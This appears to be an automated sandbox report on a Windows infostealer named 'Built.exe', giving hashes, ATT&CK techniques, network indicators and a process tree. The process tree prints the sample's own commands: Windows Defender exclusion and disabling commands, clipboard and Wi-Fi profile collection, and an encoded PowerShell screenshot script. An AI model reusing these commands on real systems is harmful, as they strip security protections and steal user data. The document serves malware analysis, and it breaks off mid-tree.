5c7026ad4e69c6fc5909613a63be5f5ee298dc5d55ef20cd9639d52afb562afa

Analysis

max time kernel
150s
max time network
151s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
24-11-2024 06:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Built.exe
Size

7.5MB
MD5

9681b16e9b2bc26f93b8147310336eb8
SHA1

332dc32e98d6eeb6ad3804b80dc7e10080b0b5f3
SHA256

5c7026ad4e69c6fc5909613a63be5f5ee298dc5d55ef20cd9639d52afb562afa
SHA512

5dc9da06dee292f2a3f471aa919d902ff45578e5bd273500e1a82e54f1d041b42b206e4d91e0284d15aaefb5bc399afcc8acb66091b805c1390d4ec730a5e821
SSDEEP

196608:zSQCwuLDurErvI9pWjgN3ZdahF0pbH1AY7CtQsNI/Sx3C1J:DAurEUWjqeWxA6nAYJ

Score

8^/10

collection credential_access defense_evasion discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2896	powershell.exe
3216	powershell.exe
4444	powershell.exe
4508	powershell.exe
5072	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
4560	powershell.exe
924	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
3860	rar.exe

Loads dropped DLL 16 IoCs

pid	Process
4672	Built.exe
4672	Built.exe
4672	Built.exe
4672	Built.exe
4672	Built.exe
4672	Built.exe
4672	Built.exe
4672	Built.exe
4672	Built.exe
4672	Built.exe
4672	Built.exe
4672	Built.exe
4672	Built.exe
4672	Built.exe
4672	Built.exe
4672	Built.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
22	discord.com
23	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
20	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Enumerates processes with tasklist 1 TTPs 3 IoCs

discovery

Process Discovery

T1057

pid	Process
1524	tasklist.exe
4860	tasklist.exe
2932	tasklist.exe

UPX packed file 56 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000a000000023b8c-21.dat	upx
behavioral2/memory/4672-25-0x00007FFEC6540000-0x00007FFEC6C04000-memory.dmp	upx
behavioral2/files/0x000a000000023b7f-27.dat	upx
behavioral2/memory/4672-30-0x00007FFED9720000-0x00007FFED9745000-memory.dmp	upx
behavioral2/files/0x000a000000023b8a-29.dat	upx
behavioral2/memory/4672-48-0x00007FFED98D0000-0x00007FFED98DF000-memory.dmp	upx
behavioral2/files/0x000a000000023b86-47.dat	upx
behavioral2/files/0x000a000000023b85-46.dat	upx
behavioral2/files/0x000a000000023b84-45.dat	upx
behavioral2/files/0x000a000000023b83-44.dat	upx
behavioral2/files/0x000a000000023b82-43.dat	upx
behavioral2/files/0x000a000000023b81-42.dat	upx
behavioral2/files/0x000a000000023b80-41.dat	upx
behavioral2/files/0x000a000000023b7e-40.dat	upx
behavioral2/files/0x000a000000023b91-39.dat	upx
behavioral2/files/0x000a000000023b90-38.dat	upx
behavioral2/files/0x000a000000023b8f-37.dat	upx
behavioral2/files/0x000a000000023b8b-34.dat	upx
behavioral2/files/0x000a000000023b89-33.dat	upx
behavioral2/memory/4672-54-0x00007FFED5EC0000-0x00007FFED5EED000-memory.dmp	upx
behavioral2/memory/4672-56-0x00007FFED5EA0000-0x00007FFED5EBA000-memory.dmp	upx
behavioral2/memory/4672-58-0x00007FFED5890000-0x00007FFED58B4000-memory.dmp	upx
behavioral2/memory/4672-60-0x00007FFEC6090000-0x00007FFEC620F000-memory.dmp	upx
behavioral2/memory/4672-64-0x00007FFED6490000-0x00007FFED649D000-memory.dmp	upx
behavioral2/memory/4672-63-0x00007FFED9700000-0x00007FFED9719000-memory.dmp	upx
behavioral2/memory/4672-67-0x00007FFED6450000-0x00007FFED6483000-memory.dmp	upx
behavioral2/memory/4672-66-0x00007FFEC6540000-0x00007FFEC6C04000-memory.dmp	upx
behavioral2/memory/4672-72-0x00007FFED5CD0000-0x00007FFED5D9D000-memory.dmp	upx
behavioral2/memory/4672-71-0x00007FFED9720000-0x00007FFED9745000-memory.dmp	upx
behavioral2/memory/4672-70-0x00007FFEC5B60000-0x00007FFEC6089000-memory.dmp	upx
behavioral2/memory/4672-74-0x00007FFED6430000-0x00007FFED6444000-memory.dmp	upx
behavioral2/memory/4672-81-0x00007FFED5BB0000-0x00007FFED5CCB000-memory.dmp	upx
behavioral2/memory/4672-76-0x00007FFED6420000-0x00007FFED642D000-memory.dmp	upx
behavioral2/memory/4672-168-0x00007FFED5890000-0x00007FFED58B4000-memory.dmp	upx
behavioral2/memory/4672-194-0x00007FFEC6090000-0x00007FFEC620F000-memory.dmp	upx
behavioral2/memory/4672-296-0x00007FFED6450000-0x00007FFED6483000-memory.dmp	upx
behavioral2/memory/4672-299-0x00007FFEC5B60000-0x00007FFEC6089000-memory.dmp	upx
behavioral2/memory/4672-304-0x00007FFED5CD0000-0x00007FFED5D9D000-memory.dmp	upx
behavioral2/memory/4672-321-0x00007FFEC6090000-0x00007FFEC620F000-memory.dmp	upx
behavioral2/memory/4672-315-0x00007FFEC6540000-0x00007FFEC6C04000-memory.dmp	upx
behavioral2/memory/4672-316-0x00007FFED9720000-0x00007FFED9745000-memory.dmp	upx
behavioral2/memory/4672-355-0x00007FFED6490000-0x00007FFED649D000-memory.dmp	upx
behavioral2/memory/4672-361-0x00007FFEC6090000-0x00007FFEC620F000-memory.dmp	upx
behavioral2/memory/4672-368-0x00007FFED5BB0000-0x00007FFED5CCB000-memory.dmp	upx
behavioral2/memory/4672-367-0x00007FFED6420000-0x00007FFED642D000-memory.dmp	upx
behavioral2/memory/4672-366-0x00007FFED6430000-0x00007FFED6444000-memory.dmp	upx
behavioral2/memory/4672-365-0x00007FFEC5B60000-0x00007FFEC6089000-memory.dmp	upx
behavioral2/memory/4672-364-0x00007FFED5CD0000-0x00007FFED5D9D000-memory.dmp	upx
behavioral2/memory/4672-363-0x00007FFED6450000-0x00007FFED6483000-memory.dmp	upx
behavioral2/memory/4672-362-0x00007FFED9700000-0x00007FFED9719000-memory.dmp	upx
behavioral2/memory/4672-360-0x00007FFED5890000-0x00007FFED58B4000-memory.dmp	upx
behavioral2/memory/4672-359-0x00007FFED5EA0000-0x00007FFED5EBA000-memory.dmp	upx
behavioral2/memory/4672-358-0x00007FFED5EC0000-0x00007FFED5EED000-memory.dmp	upx
behavioral2/memory/4672-357-0x00007FFED98D0000-0x00007FFED98DF000-memory.dmp	upx
behavioral2/memory/4672-356-0x00007FFED9720000-0x00007FFED9745000-memory.dmp	upx
behavioral2/memory/4672-340-0x00007FFEC6540000-0x00007FFEC6C04000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
2936	netsh.exe
4604	cmd.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
3892	WMIC.exe

Gathers system information 1 TTPs 1 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
1296	systeminfo.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
3216	powershell.exe
3216	powershell.exe
2896	powershell.exe
2896	powershell.exe
4444	powershell.exe
4444	powershell.exe
4560	powershell.exe
4560	powershell.exe
3216	powershell.exe
3216	powershell.exe
2896	powershell.exe
2896	powershell.exe
4184	powershell.exe
4184	powershell.exe
4444	powershell.exe
4560	powershell.exe
4184	powershell.exe
4508	powershell.exe
4508	powershell.exe
1144	powershell.exe
1144	powershell.exe
5072	powershell.exe
5072	powershell.exe
1040	powershell.exe
1040	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2932	tasklist.exe
Token: SeDebugPrivilege	1524	tasklist.exe
Token: SeDebugPrivilege	3216	powershell.exe
Token: SeDebugPrivilege	2896	powershell.exe
Token: SeDebugPrivilege	4444	powershell.exe
Token: SeIncreaseQuotaPrivilege	1552	WMIC.exe
Token: SeSecurityPrivilege	1552	WMIC.exe
Token: SeTakeOwnershipPrivilege	1552	WMIC.exe
Token: SeLoadDriverPrivilege	1552	WMIC.exe
Token: SeSystemProfilePrivilege	1552	WMIC.exe
Token: SeSystemtimePrivilege	1552	WMIC.exe
Token: SeProfSingleProcessPrivilege	1552	WMIC.exe
Token: SeIncBasePriorityPrivilege	1552	WMIC.exe
Token: SeCreatePagefilePrivilege	1552	WMIC.exe
Token: SeBackupPrivilege	1552	WMIC.exe
Token: SeRestorePrivilege	1552	WMIC.exe
Token: SeShutdownPrivilege	1552	WMIC.exe
Token: SeDebugPrivilege	1552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1552	WMIC.exe
Token: SeRemoteShutdownPrivilege	1552	WMIC.exe
Token: SeUndockPrivilege	1552	WMIC.exe
Token: SeManageVolumePrivilege	1552	WMIC.exe
Token: 33	1552	WMIC.exe
Token: 34	1552	WMIC.exe
Token: 35	1552	WMIC.exe
Token: 36	1552	WMIC.exe
Token: SeDebugPrivilege	4860	tasklist.exe
Token: SeDebugPrivilege	4560	powershell.exe
Token: SeIncreaseQuotaPrivilege	1552	WMIC.exe
Token: SeSecurityPrivilege	1552	WMIC.exe
Token: SeTakeOwnershipPrivilege	1552	WMIC.exe
Token: SeLoadDriverPrivilege	1552	WMIC.exe
Token: SeSystemProfilePrivilege	1552	WMIC.exe
Token: SeSystemtimePrivilege	1552	WMIC.exe
Token: SeProfSingleProcessPrivilege	1552	WMIC.exe
Token: SeIncBasePriorityPrivilege	1552	WMIC.exe
Token: SeCreatePagefilePrivilege	1552	WMIC.exe
Token: SeBackupPrivilege	1552	WMIC.exe
Token: SeRestorePrivilege	1552	WMIC.exe
Token: SeShutdownPrivilege	1552	WMIC.exe
Token: SeDebugPrivilege	1552	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1552	WMIC.exe
Token: SeRemoteShutdownPrivilege	1552	WMIC.exe
Token: SeUndockPrivilege	1552	WMIC.exe
Token: SeManageVolumePrivilege	1552	WMIC.exe
Token: 33	1552	WMIC.exe
Token: 34	1552	WMIC.exe
Token: 35	1552	WMIC.exe
Token: 36	1552	WMIC.exe
Token: SeDebugPrivilege	4184	powershell.exe
Token: SeDebugPrivilege	4508	powershell.exe
Token: SeDebugPrivilege	1144	powershell.exe
Token: SeIncreaseQuotaPrivilege	4512	WMIC.exe
Token: SeSecurityPrivilege	4512	WMIC.exe
Token: SeTakeOwnershipPrivilege	4512	WMIC.exe
Token: SeLoadDriverPrivilege	4512	WMIC.exe
Token: SeSystemProfilePrivilege	4512	WMIC.exe
Token: SeSystemtimePrivilege	4512	WMIC.exe
Token: SeProfSingleProcessPrivilege	4512	WMIC.exe
Token: SeIncBasePriorityPrivilege	4512	WMIC.exe
Token: SeCreatePagefilePrivilege	4512	WMIC.exe
Token: SeBackupPrivilege	4512	WMIC.exe
Token: SeRestorePrivilege	4512	WMIC.exe
Token: SeShutdownPrivilege	4512	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1936 wrote to memory of 4672	1936	Built.exe	82
PID 1936 wrote to memory of 4672	1936	Built.exe	82
PID 4672 wrote to memory of 4156	4672	Built.exe	83
PID 4672 wrote to memory of 4156	4672	Built.exe	83
PID 4672 wrote to memory of 4364	4672	Built.exe	84
PID 4672 wrote to memory of 4364	4672	Built.exe	84
PID 4672 wrote to memory of 3992	4672	Built.exe	85
PID 4672 wrote to memory of 3992	4672	Built.exe	85
PID 4672 wrote to memory of 3680	4672	Built.exe	86
PID 4672 wrote to memory of 3680	4672	Built.exe	86
PID 4672 wrote to memory of 3276	4672	Built.exe	91
PID 4672 wrote to memory of 3276	4672	Built.exe	91
PID 4672 wrote to memory of 920	4672	Built.exe	92
PID 4672 wrote to memory of 920	4672	Built.exe	92
PID 4156 wrote to memory of 2896	4156	cmd.exe	95
PID 4156 wrote to memory of 2896	4156	cmd.exe	95
PID 920 wrote to memory of 2932	920	cmd.exe	96
PID 920 wrote to memory of 2932	920	cmd.exe	96
PID 3680 wrote to memory of 3216	3680	cmd.exe	97
PID 3680 wrote to memory of 3216	3680	cmd.exe	97
PID 4672 wrote to memory of 2372	4672	Built.exe	98
PID 4672 wrote to memory of 2372	4672	Built.exe	98
PID 4672 wrote to memory of 924	4672	Built.exe	99
PID 4672 wrote to memory of 924	4672	Built.exe	99
PID 4672 wrote to memory of 4176	4672	Built.exe	101
PID 4672 wrote to memory of 4176	4672	Built.exe	101
PID 3276 wrote to memory of 1524	3276	cmd.exe	103
PID 3276 wrote to memory of 1524	3276	cmd.exe	103
PID 4364 wrote to memory of 4444	4364	cmd.exe	105
PID 4364 wrote to memory of 4444	4364	cmd.exe	105
PID 4672 wrote to memory of 5004	4672	Built.exe	106
PID 4672 wrote to memory of 5004	4672	Built.exe	106
PID 4672 wrote to memory of 4604	4672	Built.exe	108
PID 4672 wrote to memory of 4604	4672	Built.exe	108
PID 4672 wrote to memory of 1816	4672	Built.exe	109
PID 4672 wrote to memory of 1816	4672	Built.exe	109
PID 4672 wrote to memory of 4568	4672	Built.exe	110
PID 4672 wrote to memory of 4568	4672	Built.exe	110
PID 3992 wrote to memory of 1520	3992	cmd.exe	115
PID 3992 wrote to memory of 1520	3992	cmd.exe	115
PID 2372 wrote to memory of 1552	2372	cmd.exe	116
PID 2372 wrote to memory of 1552	2372	cmd.exe	116
PID 924 wrote to memory of 4560	924	cmd.exe	117
PID 924 wrote to memory of 4560	924	cmd.exe	117
PID 4176 wrote to memory of 4860	4176	cmd.exe	118
PID 4176 wrote to memory of 4860	4176	cmd.exe	118
PID 1816 wrote to memory of 1296	1816	cmd.exe	119
PID 1816 wrote to memory of 1296	1816	cmd.exe	119
PID 5004 wrote to memory of 872	5004	cmd.exe	120
PID 5004 wrote to memory of 872	5004	cmd.exe	120
PID 4568 wrote to memory of 4184	4568	cmd.exe	122
PID 4568 wrote to memory of 4184	4568	cmd.exe	122
PID 4604 wrote to memory of 2936	4604	cmd.exe	121
PID 4604 wrote to memory of 2936	4604	cmd.exe	121
PID 4672 wrote to memory of 4556	4672	Built.exe	123
PID 4672 wrote to memory of 4556	4672	Built.exe	123
PID 4556 wrote to memory of 624	4556	cmd.exe	125
PID 4556 wrote to memory of 624	4556	cmd.exe	125
PID 4672 wrote to memory of 3608	4672	Built.exe	126
PID 4672 wrote to memory of 3608	4672	Built.exe	126
PID 3608 wrote to memory of 4408	3608	cmd.exe	128
PID 3608 wrote to memory of 4408	3608	cmd.exe	128
PID 4672 wrote to memory of 3748	4672	Built.exe	129
PID 4672 wrote to memory of 3748	4672	Built.exe	129

C:\Users\Admin\AppData\Local\Temp\Built.exe
"C:\Users\Admin\AppData\Local\Temp\Built.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1936
- C:\Users\Admin\AppData\Local\Temp\Built.exe
  "C:\Users\Admin\AppData\Local\Temp\Built.exe"
  2⤵
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:4672
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4156
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4364
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Done', 0, 'Done', 48+16);close()""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3992
  - - C:\Windows\system32\mshta.exe
      mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Done', 0, 'Done', 48+16);close()"
      4⤵
      PID:1520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎‌ ‍ .scr'"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\‎‌ ‍ .scr'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3276
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:1524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:920
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:2932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2372
  - - C:\Windows\System32\Wbem\WMIC.exe
      WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4560
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4176
  - - C:\Windows\system32\tasklist.exe
      tasklist /FO LIST
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:4860
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5004
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:872
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:4604
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profile
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2936
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "systeminfo"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1816
  - - C:\Windows\system32\systeminfo.exe
      systeminfo
      4⤵
      Gathers system information
      PID:1296
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4568
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
